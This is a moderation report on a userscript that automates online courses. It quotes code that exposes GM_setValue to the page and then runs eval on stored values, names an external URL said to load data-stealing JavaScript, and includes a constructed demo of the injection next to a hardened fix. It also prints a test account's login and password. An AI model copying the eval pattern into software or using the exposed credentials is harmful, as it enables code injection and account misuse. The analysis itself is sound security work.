
FCQ网课通助手[全网题库][通用智能适配答题][刷课] was reported 28-07-2024 for Disallowed external code

The reporter said:

At line 911:

function opeationUi(menu) {
    this.fcq_xm_answer = null;
    this.$ = $;
    this.menu = menu;
    this.xm_window = window;              // keeps a reference to the script's window
    this.initMenu();
    this.config = {};
    unsafeWindow.mainProcedure = this;    // exposes this object (and xm_window) to the page
    window.mainProcedure = this;
    return this;
}

This function assigns window to xm_window and then assigns this to unsafeWindow, covertly setting this as the original web page's mainProcedure. Then, through window.mainProcedure.xm_window.GM_setValue, the function allows dynamic code to be invoked from the front end.


The specific execution location is at line 1531:

var initSet = `var VideoSpeed=1`;
if (!GM_getValue('initSet')) {
    GM_setValue('initSet', initSet);      // only stores the default on first run
}
eval(GM_getValue('initSet'));             // executes whatever is currently stored

This code is supposed to execute var initSet = `var VideoSpeed=1`, but after the front end calls GM_setValue to modify it, this value has become malicious code. The actual code is loaded from: https://tcb-w644nfbyxrttaih-2cpr71dbf4b7-1304481250.tcloudbaseapp.com/static/js/pages-index-list.b35c5d5a.js. This behavior already violates the rules.

After analyzing this code, it was found that it obtains the user's name, user ID and other information and uploads it to a third-party server. It also silently collects all course information in the background and uploads it without the user's consent.

Please explain.

Test website: https://i.mooc.chaoxing.com/
TestUserName and TestPassword: 15637670952 wdm20020810
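The pattern the report describes (a page-reachable handle to the script's GM_setValue, followed by eval of the stored value) reduces to a small model. The following is an added example, not code from the reported script or from Greasy Fork: the storage, the sandbox window, unsafeWindow and the page-side tampering code are all constructed stand-ins, and hardenedInit is one hypothetical fix (no export to the page, JSON config instead of eval), not the script author's.

```javascript
'use strict';

// Constructed stand-in for the userscript manager's persistent storage.
const gmStore = new Map();
function GM_getValue(key, fallback) { return gmStore.has(key) ? gmStore.get(key) : fallback; }
function GM_setValue(key, value) { gmStore.set(key, value); }

// Constructed stand-ins: the script's sandbox window, which (as the report says
// of xm_window) carries GM_setValue, and the page's real global object.
const sandboxWindow = { GM_getValue, GM_setValue };
const unsafeWindow = {};

// --- Vulnerable pattern: same shape as the quoted opeationUi + line 1531 ---
function vulnerableInit() {
  const mainProcedure = { xm_window: sandboxWindow };
  unsafeWindow.mainProcedure = mainProcedure;        // page can now reach GM_setValue
  const initSet = 'var VideoSpeed=1';
  if (!GM_getValue('initSet')) GM_setValue('initSet', initSet);
  return GM_getValue('initSet');                     // later fed to eval()
}

// Constructed page-side code: what any script on the web page can do once the
// handle is exposed. It never needs userscript privileges of its own.
function pageTampers(win, payload) {
  const exposed = win.mainProcedure && win.mainProcedure.xm_window;
  if (!exposed || typeof exposed.GM_setValue !== 'function') return false;
  exposed.GM_setValue('initSet', payload);           // overwrite the "config"
  return true;
}

function runVulnerableScenario() {
  gmStore.clear();
  vulnerableInit();                                  // first run: benign default stored
  const payload = 'globalThis.__page_ran = true; var VideoSpeed = 1;';
  const reached = pageTampers(unsafeWindow, payload);
  const stored = GM_getValue('initSet');
  (0, eval)(stored);                                 // indirect eval, as eval(GM_getValue(...)) effectively is
  return { reached, stored, pageCodeRan: globalThis.__page_ran === true };
}

// --- Hypothetical hardened init: nothing exported to the page, no eval ---
function hardenedInit() {
  const defaults = { VideoSpeed: 1 };
  let cfg = {};
  try { cfg = JSON.parse(GM_getValue('initSet', '{}')); } catch (e) { cfg = {}; }
  const speed = Number(cfg && cfg.VideoSpeed);
  // Validate the value instead of executing it; reject anything out of range.
  const VideoSpeed = Number.isFinite(speed) && speed > 0 && speed <= 16 ? speed : defaults.VideoSpeed;
  return { VideoSpeed };
}

console.log(JSON.stringify(runVulnerableScenario()));
gmStore.clear();
GM_setValue('initSet', 'globalThis.__page_ran = true;');   // page-written string
console.log(JSON.stringify(hardenedInit()));               // falls back to defaults
```

The hardened version still uses GM storage; the difference is that the page never gets a reference into the sandbox, and whatever lands in storage is parsed and range-checked rather than evaluated.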

webstudy said:
The evidence provided is that additional functionality has been added, which the script does not have.

This script has been updated since the report was filed.

This script has had 3 previous upheld or fixed reports.

webstudy (the reported user) has made:

This report has been upheld by a moderator.

The script has functionality to run eval() on unknown external code.